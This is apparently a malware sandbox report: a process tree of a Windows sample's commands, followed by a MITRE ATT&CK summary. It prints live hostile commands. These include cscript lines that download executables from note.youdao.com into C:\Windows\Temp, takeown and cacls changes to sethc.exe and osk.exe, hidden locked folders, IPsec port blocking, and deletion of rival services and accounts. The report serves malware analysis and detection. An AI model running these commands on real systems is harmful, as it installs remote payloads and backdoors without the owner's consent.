C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1353⤵PID:4616
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1373⤵PID:5608
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1383⤵PID:4796
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1393⤵PID:7228
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=4453⤵PID:2188
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=Allow action=permit3⤵PID:1876
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block3⤵PID:6460
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny3⤵PID:7924
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Aliyun assign=y3⤵PID:2360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "NETControlUpdate" /f3⤵PID:5612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "WinHostStartForMachine" /f3⤵PID:7436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftUpdate" /f3⤵PID:7296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "AdobeFlashPlayer" /f3⤵PID:1768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "Adobe Flash Player Updaters" /f3⤵PID:5308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "Font upgrade service" /f3⤵PID:3344
-
-
C:\Windows\SysWOW64\sc.exesc stop FastUserSwitchingCompatibility3⤵
- Launches sc.exe
PID:5644
-
-
C:\Windows\SysWOW64\sc.exesc delete FastUserSwitchingCompatibility3⤵
- Launches sc.exe
PID:5392
-
-
C:\Windows\SysWOW64\sc.exesc stop PSEXESVC3⤵
- Launches sc.exe
PID:5412
-
-
C:\Windows\SysWOW64\sc.exesc delete PSEXESVC3⤵
- Launches sc.exe
PID:5480
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im rundll32.exe3⤵
- Kills process with taskkill
PID:5396
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\SpeechsTracing3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:4940
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='spoolsv.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\spoolsv.exe'" call Terminate3⤵
- Kills process with WMI
PID:7200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7928
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SpeechsTracing\spoolsv.exe /d everyone3⤵PID:4872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5376
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SpeechsTracing /t /d everyone3⤵PID:5368
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\SecureBootThemes\\Microsoft\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:1536
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\sysprepthemes\\microsoft\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:4504
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\Microsoft\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:1276
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\SecureBootThemes3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:7292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5208
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SecureBootThemes /p everyone:n /d system3⤵PID:4344
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\System32\wmassrv.dll3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:7460
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\System32\HalPluginsServices.dll3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:5336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4872
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\wmassrv.dll /d everyone3⤵PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5708
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\HalPluginsServices.dll /d everyone3⤵PID:5652
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r +a C:\Windows\sysprepthemes3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:3344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4276
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\sysprepthemes /d everyone3⤵PID:5412
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WScript.exe /im *.tmp /im *.jpg /im *.cc33⤵
- Kills process with taskkill
PID:5220
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\program files (x86)\exfg"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:7736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1268
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\program files (x86)\exfg" /d everyone3⤵PID:2408
-
-
C:\Windows\SysWOW64\sc.exesc stop "Amxend Msbtvsqv Ble"3⤵
- Launches sc.exe
PID:568
-
-
C:\Windows\SysWOW64\sc.exesc delete "Amxend Msbtvsqv Ble"3⤵
- Launches sc.exe
PID:2328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1664
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\programdata\application data\storm\update" /g users:r3⤵PID:4504
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\*.cc3 /a3⤵
- Modifies file permissions
PID:968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5660
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\SysWOW64\*.cc3" /t /p everyone:n3⤵PID:3688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3748
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\programdata\application data\storm\update\*.cc3" /t /p everyone:n3⤵PID:1276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7292
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\programdata\application data\storm\update\*.tmp" /t /p everyone:n3⤵PID:1220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3212
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\programdata\application data\storm\update\*.jpg" /t /p everyone:n3⤵PID:3824
-
-
C:\Windows\SysWOW64\sc.exesc stop bddlsvc3⤵PID:5336
-
-
C:\Windows\SysWOW64\sc.exesc delete bddlsvc3⤵PID:5308
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im crawler.exe /im Crowdtest.exe /im CrowdtestWatcher.exe /im Kerrigan.exe /im adb.exe /im phantomjs.exe3⤵
- Kills process with taskkill
PID:1152
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
PID:7776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /end /tn "Securitycript"3⤵PID:5528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn Securitycript /f3⤵PID:2352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn GooglePinginConfigs /f3⤵PID:5644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn RavTask /f3⤵PID:5220
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Setting.exe3⤵
- Kills process with taskkill
PID:1380
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Program Files (x86)\Microsoft MSBuild\Setting.exe"3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:1744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5476
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft MSBuild\Setting.exe" /d everyone3⤵PID:7736
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft MSBuild\Setting.exe" /p everyone:n /d system3⤵PID:7220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\inf\temp1.bat2⤵PID:3488
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sethc.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4792
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /g Administrators:f3⤵PID:4332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2816
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Users:r3⤵PID:1884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3260
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Administrators:r3⤵PID:4932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3312
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d SERVICE3⤵PID:3308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2360
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d "network service"3⤵PID:984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3600
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g system:r3⤵PID:4988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\osk.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3568
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /g Administrators:f3⤵PID:3268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2536
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /g Users:r3⤵PID:4592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3140
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /g Administrators:r3⤵PID:1420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4084
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /d SERVICE3⤵PID:2764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:556
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /d "network service"3⤵PID:4336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3200
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\osk.exe /e /g system:r3⤵PID:2428
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f3⤵PID:4276
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /f3⤵PID:4448
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlser.exe" /f3⤵PID:4476
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /f3⤵
- Sets file execution options in registry
PID:2900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\smss.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5000
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\smss.exe /g everyone:f3⤵PID:2480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sethc.exe /a3⤵
- Modifies file permissions
PID:5004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:444
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /g system:f3⤵PID:1524
-
-
C:\Windows\SysWOW64\cscript.execscript xxoo.vbs "http://note.youdao.com/yws/api/personal/file/WEBb6b3acba5104f41c9b364680f28de9f9?method=download&inline=true&shareKey=c5aa6f51dffffee47d0ee728d894f348" C:\Windows\Temp\0AHM.exe3⤵
- Blocklisted process makes network request
PID:4960
-
-
C:\Windows\SysWOW64\cscript.execscript xxoo.vbs "http://note.youdao.com/yws/api/personal/file/WEB413662f5cc07627e58c48fe17d4d29d0?method=download&inline=true&shareKey=eb9998a97429406e7ea9f4bf2bf14549" C:\Windows\Temp\0osk.exe3⤵
- Blocklisted process makes network request
PID:8052
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.13⤵
- Runs ping.exe
PID:8116
-
-
C:\Windows\SysWOW64\sc.exesc stop HostManger3⤵PID:5704
-
-
C:\Windows\SysWOW64\sc.exesc delete HostManger3⤵PID:7316
-
-
C:\Windows\SysWOW64\sc.exesc stop Hostserver3⤵
- Launches sc.exe
PID:4160
-
-
C:\Windows\SysWOW64\sc.exesc delete Hostserver3⤵PID:1688
-
-
C:\Windows\SysWOW64\sc.exesc stop ServicesMain3⤵PID:2236
-
-
C:\Windows\SysWOW64\sc.exesc delete ServicesMain3⤵
- Launches sc.exe
PID:2956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\fonts /a3⤵
- Modifies file permissions
PID:5456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\rundllhost.exe /a3⤵
- Modifies file permissions
PID:5420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\dlllhost.exe /a3⤵
- Modifies file permissions
PID:5704
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\conhost.exe /a3⤵
- Modifies file permissions
PID:4796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\svchost.exe /a3⤵
- Modifies file permissions
PID:7860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\csrss.exe /a3⤵
- Modifies file permissions
PID:2984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\Fonts\KvMonXP.exe /a3⤵
- Modifies file permissions
PID:4372
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\KvMonXP.exe3⤵
- Views/modifies file attributes
PID:7924
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\rundllhost.exe3⤵
- Views/modifies file attributes
PID:3276
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\dlllhost.exe3⤵
- Views/modifies file attributes
PID:3972
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\conhost.exe3⤵
- Views/modifies file attributes
PID:2272
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\svchost.exe3⤵
- Views/modifies file attributes
PID:1884
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r C:\Windows\Fonts\csrss.exe3⤵
- Views/modifies file attributes
PID:7008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5460
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\rundllhost.exe" /g everyone:f3⤵PID:3044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5448
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\dlllhost.exe" /g everyone:f3⤵PID:5420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5664
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\conhost.exe" /g everyone:f3⤵PID:3256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7968
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\svchost.exe" /g everyone:f3⤵PID:5544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3988
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\csrss.exe" /g everyone:f3⤵PID:2252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7904
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\Fonts\KvMonXP.exe" /g everyone:f3⤵PID:6488
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 4936, level 3)
  wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
  - Kills process with WMI

C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 4480, level 3)
  wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\Fonts\\svchost.exe'" call Terminate
  - Kills process with WMI

C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 6468, level 3)
  wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\Fonts\\conhost.exe'" call Terminate
  - Kills process with WMI

C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 7232, level 3)
  wmic process where "name='lsass.exe' and ExecutablePath='C:\\Windows\\Fonts\\lsass.exe'" call Terminate
  - Kills process with WMI

C:\Windows\SysWOW64\taskkill.exe (PID 4792, level 3)
  taskkill /f /t /im rundllhost.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\taskkill.exe (PID 1512, level 3)
  taskkill /f /t /im dlllhost.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\taskkill.exe (PID 3440, level 3)
  taskkill /f /t /im KvMonXP.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\taskkill.exe (PID 7020, level 3)
  taskkill /f /t /im dllhots.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\taskkill.exe (PID 2472, level 3)
  taskkill /f /t /im d11hots.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\reg.exe (PID 2900, level 3)
  reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvMonXP.exe" /f

C:\Windows\SysWOW64\sc.exe (PID 5664, level 3)
  sc stop MicrosotMais
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 5644, level 3)
  sc delete MicrosotMais
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 5212, level 3)
  sc delete MicrosotMaims
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 6576, level 3)
  sc stop MicrosotMaims

C:\Windows\SysWOW64\sc.exe (PID 5808, level 3)
  sc stop MicrosotSais

C:\Windows\SysWOW64\sc.exe (PID 6388, level 3)
  sc delete MicrosotSais
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 7460, level 3)
  sc stop MicrosotSaims

C:\Windows\SysWOW64\sc.exe (PID 5348, level 3)
  sc delete MicrosotSaims
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 5372, level 3)
  sc stop ServiceSaims
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 1536, level 3)
  sc delete ServiceSaims

C:\Windows\SysWOW64\sc.exe (PID 5220, level 3)
  sc stop ServiceSais

C:\Windows\SysWOW64\sc.exe (PID 1268, level 3)
  sc delete ServiceSais
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 7724, level 3)
  sc stop ServiceMais

C:\Windows\SysWOW64\sc.exe (PID 4032, level 3)
  sc delete ServiceMais

C:\Windows\SysWOW64\sc.exe (PID 1868, level 3)
  sc stop ServiceMaims
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 7848, level 3)
  sc delete ServiceMaims
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 2408, level 3)
  sc stop NetPipeAtcivator
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 1276, level 3)
  sc delete NetPipeAtcivator
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 5660, level 3)
  sc stop FormManger

C:\Windows\SysWOW64\sc.exe (PID 3688, level 3)
  sc delete FormManger
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 1444, level 3)
  sc stop Famserver

C:\Windows\SysWOW64\sc.exe (PID 6576, level 3)
  sc delete Famserver
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 5808, level 3)
  sc delete Samsorver

C:\Windows\SysWOW64\sc.exe (PID 7376, level 3)
  sc stop Samsorver

C:\Windows\SysWOW64\sc.exe (PID 6392, level 3)
  sc delete Microsarver
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 3824, level 3)
  sc stop Microsarver

C:\Windows\SysWOW64\net.exe (PID 4276, level 3)
  net user mm123$ /del

  C:\Windows\SysWOW64\net1.exe (PID 5344, level 4)
    C:\Windows\system32\net1 user mm123$ /del

C:\Windows\SysWOW64\net.exe (PID 7436, level 3)
  net user admin$ /del

  C:\Windows\SysWOW64\net1.exe (PID 7776, level 4)
    C:\Windows\system32\net1 user admin$ /del

C:\Windows\SysWOW64\net.exe (PID 1268, level 3)
  net user aliyun /del

  C:\Windows\SysWOW64\net1.exe (PID 7736, level 4)
    C:\Windows\system32\net1 user aliyun /del

C:\Windows\SysWOW64\net.exe (PID 1868, level 3)
  net user lcy /del

  C:\Windows\SysWOW64\net1.exe (PID 2136, level 4)
    C:\Windows\system32\net1 user lcy /del

C:\Windows\SysWOW64\taskkill.exe (PID 5408, level 3)
  taskkill /f /t /im rundll32.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\cscript.exe (PID 5580, level 3)
  cscript xxoo.vbs "http://note.youdao.com/yws/api/personal/file/WEBba2227a56359db179ebf9a924bc233d3?method=download&inline=true&shareKey=89273cb26401400b293be41d8c5cffa5" C:\Windows\Temp\smss.exe
  - Blocklisted process makes network request

C:\Windows\SysWOW64\PING.EXE (PID 2240, level 3)
  ping 127.1 -n 3
  - Runs ping.exe

C:\Windows\SysWOW64\sc.exe (PID 8204, level 3)
  sc start Microsarver
  - Launches sc.exe

C:\Windows\SysWOW64\sc.exe (PID 8220, level 3)
  sc start Microsarver

C:\Windows\SysWOW64\WScript.exe (PID 4016, level 2)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
  - Deletes itself

C:\windows\Installer\conhost.exe (PID 8084, level 1)
  C:\windows\Installer\conhost.exe
  - Executes dropped EXE
  - Drops file in Program Files directory

C:\Windows\system32\svchost.exe (PID 8144, level 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\BackgroundTransferHost.exe (PID 1404, level 1)
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

Network
MITRE ATT&CK Enterprise v15 (count of matching behaviours in parentheses)

Execution
  Command and Scripting Interpreter (1)
  Scheduled Task/Job (1)
  System Services (2)
    Service Execution (2)

Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (3)
    Windows Service (3)
  Scheduled Task/Job (1)

Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (3)
    Windows Service (3)
  Scheduled Task/Job (1)

Defense Evasion
  File and Directory Permissions Modification (1)
  Hide Artifacts (2)
    Hidden Files and Directories (2)
  Impair Defenses (2)
    Disable or Modify System Firewall (1)
  Modify Registry (2)
Downloads